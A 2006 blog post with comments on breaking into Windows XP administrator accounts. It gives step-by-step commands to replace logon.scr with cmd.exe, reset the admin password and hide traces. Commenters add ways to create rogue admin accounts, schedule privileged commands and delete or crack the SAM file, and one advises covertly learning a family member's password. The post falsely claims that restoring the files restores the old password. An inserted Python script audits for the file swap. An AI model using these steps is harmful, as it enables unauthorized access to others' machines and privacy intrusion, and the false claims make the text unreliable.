Internet Business Daily

How to Hack a Windows XP Admin’s Password

Posted by Quinn Zerfas On November - 2 - 2006

This is a cool little computer trick for Microsoft Windows that I’ve picked up in my travels, and I decided to share it with you fine and ethical individuals =). Log in, go to your DOS command prompt, and enter these commands exactly:

cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

What you just did is back up the command program and the screen saver file, then rename the command program so that it takes the place of the logon screen saver. When Windows loads the screen saver, you will get an unprotected DOS prompt without logging in. When this appears, enter this command that’s in parentheses (net user username password). So if the admin user name is Doug and you want the password 1234, you would enter “net user Doug 1234” and now you’ve changed the admin password to 1234. Log in, do what you want to do, then copy the contents of temphack back into system32 to cover your tracks.
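For defenders, the file swap above leaves checkable traces in system32. The following is an added example, not code from the original post: it audits a system32 directory (for instance on a mounted disk image) for a logon.scr that is really cmd.exe. The function names, the sample tree and its stand-in file contents are constructed for illustration, and known_good_sha256 is assumed to come from trusted installation media.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def find_file(directory, name):
    """Case-insensitive lookup; the analysis host may mount the volume case-sensitively."""
    for entry in directory.iterdir():
        if entry.is_file() and entry.name.lower() == name:
            return entry
    return None

def audit_logon_screensaver(system32, known_good_sha256=None):
    """Return findings for the logon.scr swap; an empty list means nothing was flagged."""
    findings = []
    scr = find_file(system32, "logon.scr")
    cmd = find_file(system32, "cmd.exe")
    if cmd is None:
        findings.append("cmd.exe missing from system32")
    if scr is None:
        return findings + ["logon.scr missing from system32"]
    scr_hash = sha256(scr)
    if cmd is not None and sha256(cmd) == scr_hash:
        findings.append("logon.scr is byte-identical to cmd.exe")
    # A cmd.exe copy parked in a subfolder (the post's backup folder) that matches logon.scr.
    for sub in sorted(d for d in system32.iterdir() if d.is_dir()):
        stray = find_file(sub, "cmd.exe")
        if stray is not None and sha256(stray) == scr_hash:
            findings.append(f"logon.scr matches the cmd.exe copy in {sub.name}")
    if known_good_sha256 and scr_hash != known_good_sha256.lower():
        findings.append("logon.scr differs from the known-good hash")
    return findings

def build_sample(root, variant):
    """Constructed sample tree; file contents are stand-ins, not real binaries."""
    s32 = root / variant / "system32"
    s32.mkdir(parents=True)
    (s32 / "cmd.exe").write_bytes(b"constructed cmd.exe stand-in")
    (s32 / "logon.scr").write_bytes(b"constructed logon.scr stand-in")
    if variant != "clean":
        (backup := s32 / "temphack").mkdir()
        (s32 / "logon.scr").replace(backup / "logon.scr")
    if variant == "rename":  # the post: cmd.exe backed up, then renamed to logon.scr
        (backup / "cmd.exe").write_bytes((s32 / "cmd.exe").read_bytes())
        (s32 / "cmd.exe").replace(s32 / "logon.scr")
    elif variant == "copy":  # the shorter variant posted in the comments
        (s32 / "logon.scr").write_bytes((s32 / "cmd.exe").read_bytes())
    return s32

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        trees = {v: build_sample(Path(tmp), v) for v in ("clean", "rename", "copy")}
        good = sha256(trees["clean"] / "logon.scr")
        return {v: audit_logon_screensaver(p, good) for v, p in trees.items()}

if __name__ == "__main__":
    print(demo())
```

Once the backup folder has been copied back, only the known-good hash comparison and file timestamps remain as evidence, and the changed account password is unaffected by restoring the files.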

351 Comments »

Comment by Mike McCormick
2006-11-02 18:17:35

Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?

Comment by poochee
2007-01-25 14:31:56

hi guys…pls teach how to make windows xp not to log on after a month or two months…pls

Comment by kaycee
2008-07-03 20:46:45

pls send me all window xp codes

Comment by rman
2008-07-11 15:30:20

dude if you want answers to any computer question you have got to check this out he has downloads/serials/computer how to’s basically everything check it out it’s amazing and FREE

http://mrcomputerguy.blogspot.com

 
Comment by nirmal
2008-10-15 22:59:25

pls give me detail i want to break the administrator’s password without opening any users.
thanks.

Comment by rakesh
2008-10-21 00:17:39

ok
jst three steps are there click start then on run there type control userpasswords2 ok then u will get administrator block there reset password option is there ok there no need of old password is there hope to get u r reply soon on pappucha@gmail.com and one more thing type the pattern same as i had written
ok enjy u r self

Comment by Dalibor
2008-12-02 09:28:27

Hey this doesn’t work at my college comp… You must be in admin group to do this… :(

 
 
 
 
Comment by sara
2008-11-17 22:06:15

restart your computer when bios screen u need press F8
continue after that u press safe mode with networking
some notes going u wait a while. after that u that windows user will be show u click administrator go to control panel click remove password after click password will be reset then u restart ur computer.

 
Comment by VIJAYKRISHNA
2008-11-28 00:45:16

GO TO ADMINISTRATIVE TOOLS
IN THAT YOU HAVE LOCAL SECURITY POLICIES —> ACCOUNT POLICIES MAKE A SMALL RESEARCH THERE BECAUSE RIGHT NOW I’M IN LIMITED USER ACCOUNT LATER I MAY NOT CATCH UP YOU

 
 
Comment by anom
Comment by saravuth
2008-07-20 18:52:36

please post how to hack to administrator account for window xp sp2 again . please saravuthream@yahoo.com

thank in advance

Comment by vinod kumar
2008-09-11 23:16:17

dear sir.

how do hack administrator password.

 
 
 
Comment by Joshua
2007-04-18 20:50:24

My command prompt doesn’t work anymore, I keep getting an error that says windows can not find cmd. Check the name? What’s going on? I did all that above and now nothing works. Thanks.
*JoSh*

Comment by mike
2007-11-25 10:16:05

yo, you can go to run and type in command prompt hit enter and it should open it in a different way so that wont happen anymore

 
Comment by darkmanxxx
2008-01-04 08:43:01

man the problem is your computer may have got a virus which first destroyed the cmd.exe file. so please first try to scan your computer with either updated F-Secure or Kaspersky new version

 
Comment by anonymous
2008-04-07 15:54:07

You can go to Notepad or open Windows Internet Explorer and right click and click source then when one of those is open type command.com then save the file as Anything You Want.bat then close it and open it again for a command prompt!

 
Comment by KK Raj
2008-04-12 22:22:02

Install “avira” antivirus in ur system

Comment by george
2008-08-07 01:26:55

hi guy I suppose you try eset antivirus it works miracles or maintain your system with Iolo system mechanics

 
 
Comment by guy
2008-05-22 16:55:08

Open My Computer
Open Local Disk
Open Windows
Open System32
click on any file and start typing command
and then you should see it

Comment by hylan143
2008-11-16 11:22:50

after you open the file what ru supposed to do? start typing “command”?

 
 
Comment by Samson Gama
2008-05-27 11:32:33

Goto C: Drive
Windows
System32
And look for cmd and drag it to the desktop

Comment by YOU DON"T KNOW ME
2008-06-02 12:33:56

This guy made such a fake name

 
 
Comment by john
2008-08-25 16:57:40

dude just put cmd.exe. thats it

 
Comment by dev
2008-10-15 03:25:30

pls format the window or repair command.com file

 
 
Comment by Joshua
2007-04-18 20:53:51

My command prompt doesn’t work anymore, I keep getting an error that says windows can not find cmd. Check the name? What’s going on? I did all that above and now nothing works. Thanks for the help!
*JoSh*

Comment by Teece
2007-06-18 13:47:58

type “command” if “cmd” doesn’t work.
also “command.com” or “cmd.com” one of those four should work.
if it doesn’t work u can email me for help
(teecehunter@yahoo.com)

 
Comment by Mechwarrior5
2007-11-07 09:00:40

It’s because you renamed your cmd.exe to logon.scr, what you need to do is take cmd.exe and logon.scr out of the temphack folder you made and put them back into the system32 folder.

Comment by Duckii
2008-02-12 22:16:00

and how do u move ur temphack folder bak to ur system32 folder?

 
 
 
Comment by Daredevil
2007-09-19 23:35:39

Hey but that doesn’t work bcoz my administrator denies the access even to change the name of the file …or delete the file

 
Comment by mano
2007-10-20 05:12:20

Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?

 
Comment by cred911
2007-10-29 02:41:49

not working.. access denied :(

 
Comment by cred911
2007-10-29 02:46:17

not working… access denied :( can’t change password.. net user administrator * :( without login as power user :( :(

Comment by killer
2008-05-14 01:55:55

Dear…
you can change only guest password but not admin ..for command net user..i will try also ..but not success.ok

 
Comment by AADW
2008-09-15 23:01:09

SEND ME THE TRICK TO HACK ADMIN PASSWORD

Comment by Had It Already
2008-09-26 16:51:52

Did you get the trick to hack into administrator password? I need it BAD! Lots of things going on at my house and hubby and son have everything blocked from me for the past month and half.

Comment by Chris
2008-11-15 06:02:05

Check out loginrecovery.com, they have a software that you can burn onto a disk and run at boot up. It will not replace the password that they have installed, however - it will let you know what password they have in there so you can log on without them knowing. That way you can pull a Ninja and see what they see without them the wiser.

I hope this helps
Chris

 
 
 
 
Comment by matt
2008-03-20 02:52:35

wat is DOS

Comment by deepak
2008-06-28 00:21:35

disk operating system…………….. buddy

 
Comment by Josie
2008-07-06 11:48:01

um. Matt its Ur Disk operating system and you can get to it by going to your start menu and clicking “Run” and enter the code. cmd

Comment by hacker
2008-09-14 17:38:44

no you idiot, DOS and Command prompt are two different things.

if you type in CMD (usually) it will open up the command prompt. if you type in command.com in run, it will open up MS-DOS.

Yes, they look the same. Yes they work the same. But they are different.

 
 
 
Comment by Ricky Gervais
2008-06-28 07:05:16

Okay somebody try their hand at this one my admin has put a software called busines lock on my PC it stops me getting to Run command and most of the programmes in My computer it is password protected how the hell do I turn it off???????

 
Comment by rman
2008-07-11 15:27:53

ooh my god guys every one check this out any question you have this guy will answer it AND if you need a download or serial for a program he has it. im telling you guys check this out.

http://mrcomputerguy.blogspot.com

 
Comment by jake
2008-07-26 21:04:55

yeah when i goto make a directory it tells me access denied i think this is because of my lack of admin or is this supposed to happen please help

 
Comment by Molly-Rose
2008-08-07 18:05:44

im in yr 7 and we have really good computers but its in classic version and it sucks. im really smart when it comes to computers but this one has me stuck. is there a simple way that i could change everything?

 
Comment by Nicky
2008-08-07 21:41:31

hi i was following the above steps and access was denied what do i do?

 
Comment by blaze
2008-10-25 08:24:40

no the password will not be restored

 
Comment by rex
2008-11-05 16:22:50

It will

 
 
Comment by Quinn Zerfas
2006-11-02 19:20:15

Yes, you are backing up their login info, deleting and making your own to get access. Putting the temphack files back is going to restore the original information

 
Comment by zambuka
2006-11-02 21:25:32

uh.. no. First of all this is old. Second of all.. the original password WILL NOT be restored. Do you honestly think password hashes are stored in the command prompt executable or the screensaver????? Come on.. if you are going to give ‘hacking’ advice.. make sure you actually know what you’re talking about. So… where did you copy this info from?

 
Comment by Chris
2006-11-02 21:59:45

Mike, no, restoring the files won’t restore the original password. The one you just created will still be in effect.

Quinn, you are just backing up the tools used to change the password. The “net password” actually changes the password in another part of the machine that you haven’t touched yourself.

 
Comment by Black Ratchet
2006-11-02 22:03:45

No. You’re wrong. Once you change the local admin’s password, that’s all she wrote. Unless you know his/her password already (so you can change it back), once you change it, it’s gone from the system.

Also, this breach won’t work if the system has NTFS as the file system, unless you have administrative rights, you won’t be able to delete logon.scr

This post is full of holes.

If you want to learn about /real/ hacking, check out Binary Revolution.

 
Comment by mhweaver
2006-11-02 22:42:53

No it won’t. You are replacing the screensaver (logon.scr) with a command prompt (cmd.exe). Putting the files back just puts the screensaver back the way it was, but not changing any other settings back.

The downside to this is you still need to be able to log in to move the files around :\

 
Comment by Dan Kordik
2006-11-02 22:49:56

a slightly shorter way of doing the same thing:

cd\
cd\windows\system32
mkdir temphack
move logon.scr temphack\logon.scr
copy cmd.exe logon.scr
exit

Comment by fan Twen
2007-02-18 09:30:44

This does not work with XP with a domain
can not move or delete logon.scr

if you have a solution to erase the admin password of my HP portable, i would be a lot grateful to you

 
Comment by Dalibor
2008-12-02 09:47:27

when i do this it says “access denied”.

 
 
Comment by Jim
2006-11-02 22:50:00

Why don’t you just delete sam that is the easiest admin password hack.

 
Comment by luser
2006-11-02 23:23:49

logon.scr is a protected file, you need admin privs to delete it. IF you already have admin privs needed to do this, then you could just change the administrator password yourself.

So, this isn’t really a hack.

 
Comment by Ivanmarsh
2006-11-03 00:27:01

A hack that requires you to be logged into the machine to set up the hack isn’t a hack. If you’re already logged into the machine what do you need the hack for?

Comment by Skeletor
2008-01-20 15:55:51

You are logged into the machine but not with administrative privileges. That’s what you need the hack for. And a brain, while you are at it.

 
 
Comment by Mark
2006-11-03 00:49:09

I wrote a simpler way to do this a long time ago. If you have ANY admin access, you can just use the command to change any other user’s password without knowing it. This was all previously covered @
http://www.allthingsmarked.com/2006/08/21/change-your-xp-password-via-the-command-line/

 
Comment by Roman
2006-11-03 01:53:02

I tried on computer in A+spec class with restricted access it doesn’t work when i tried to make directory temphack it says access denied HELP

 
Comment by naxo
2006-11-03 11:49:16

try this http://ophcrack.sourceforge.net/. Works perfectly.

 
Comment by Anonymous NT Shaman
2006-11-03 11:52:29

Brilliant! You just wiped the admin’s password and he’s going to be quite cross with you!

The two files you’ve copied DO NOT contain the Admin’s password which you can’t get that way.

You’d have to use something like the NTBACKUP and have it save the registry (System State). Restoring the registry, would of course wipe your hacked account.

You’re better off doing something like this instead:

net user i0wnU SkR1ptK!ddY /add
net localgroup Administrators i0wnU /add

This won’t add you to the domain, but will add you to the local machine.

Also, you’ll find that on a properly hardened system, you will not have permissions to overwrite the screensaver.

However, if you are allowed to run the windows scheduler via the AT command, you can schedule the above net commands to do the same thing without messing about with the screen saver. (Provided the scheduler runs as the SYSTEM or an Admin)

i.e.

AT 06:06 NET USER ….
AT 06:07 NET LOCALGROUP …

And Bob’s your uncle.

Cheers!

 
Comment by Brian Snipes
2006-11-03 14:04:18

Wouldn’t you have to already have administrator privileges in order for this to work? I wouldn’t think a user that was only in the Users group would have permissions to overwrite those file on an NTFS filesystem. Perhaps the filesystem is FAT32?

 
Comment by Gv
2006-11-03 17:21:27

Ever heard of ERD commander?…. that would be much easier if you can’t get into the comp to begin with due to a lock out … :)

Comment by learning
2007-08-07 14:11:27

Hello I see that you had offered some advice to someone back in 2006 about my loERD commander i have the software. Well what my problem is. I have a hard drive that i am trying to access but it is protected with a bios password. How can i get around it with the locksmith or can you tell me what script i should be looking for in command line once opened in notepad so i can change the value of 0 or 1 i don’t want to overwrite the hard drive. Any feedback would be greatly appreciated.

Thanks in advance!!!

 
 
Comment by gordon
2006-11-03 17:51:18

Normal system user does not have rights to copy, move, ren files in sys32. So useless unless you have rights to the C:.

 
Comment by exceed
2006-11-03 17:59:31

This only works in Windows 2000 and prior. Does not work in XP/2003. You must have Admin rights to modify files/folders in %SYSTEMROOT%\System32 directory in XP/2003.

Anyway, once you have physical access to machine use: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

 
Comment by Surferbill
2006-11-07 08:37:39

It’s a nice idea if you stick this on a USB stick and were scouring the school/office for unlocked, unattended PCs. As mentioned there are many better ways, but certainly this line would expose you straight away:

rename cmd.exe logon.scr

In effect you’ve moved cmd.exe meaning nobody on the machine can open a command prompt. Oops. :)

 
Comment by eric
2006-11-11 01:25:47

Nope. This does work on Windows XP (Most of the time). Some computers deny access while others do not. Luckily, our school’s computers all have DeepFreeze so all I need to do to remove traces is to restart the computer.

 
Comment by Mike
2006-11-11 02:28:35

Now, to turn this into a useful function quickly (lost admin password.. mistyped admin password, admin is AWOL) you could boot a nice Linux kernel, mount NTFS, and make the quick file change(s) that would then allow you to assign a new admin password.

I’ve never attempted to do this, but am going to file it away as a quick way to clean up a bad problem. I have had to pull a file from a PC and send it somewhere to have them hack the SAM file.

Comment by fan Twen
2007-02-18 09:48:10

My XP-Pro is in a domain, and the Linux-life cd does not find the harddisk !

 
 
Comment by Marc
2006-11-12 20:11:28

If you are logged in as an administrator the easiest way to change any password, including THE administrator, is simply to run ‘control userpasswords2’ (without quotes) from a command prompt, then change at will.
If I can’t even get into the beast as an administrator I use a linux bootdisk which allows me to reset any password. If there’s another way I’d be delighted to learn it here.

Comment by wags
2008-04-19 16:46:25

I tried many of the above options on my XP Pro version with Novell and yours worked great. I entered the ‘control userpasswords2’ command and was able to change the administrator password. Working for a school this is great for all the donated computers we get. Thank you!

 
 
Comment by Mongo Joe
2006-11-12 22:18:03

Just restart the friggin machine and press f8 to log in under safe mode with networking. Then log in under the administrator which is usually passwordfree. Create your own username and then restart with admin privileges. Do whatever u want then restart with f8 safemode, go under administrator and delete the account u made!!!! wtf!! :) or use this service– http://www.loginrecovery.com

Comment by fan Twen
2007-02-18 09:57:05

This does not work with XP in a domain

if you have a better solution,
i will be grateful to hear about

 
 
Comment by chad
2006-11-13 00:31:05

actually there is a way to do this without logging in. you could use a windows 2000 installation disk and boot into the repair console to run the commands. while it is a windows 2000 disk, you can still use it to log into an xp installation. also a repair console from a windows xp disk will ask you for the administrator password whereas a win2k disk will not.
-cheers!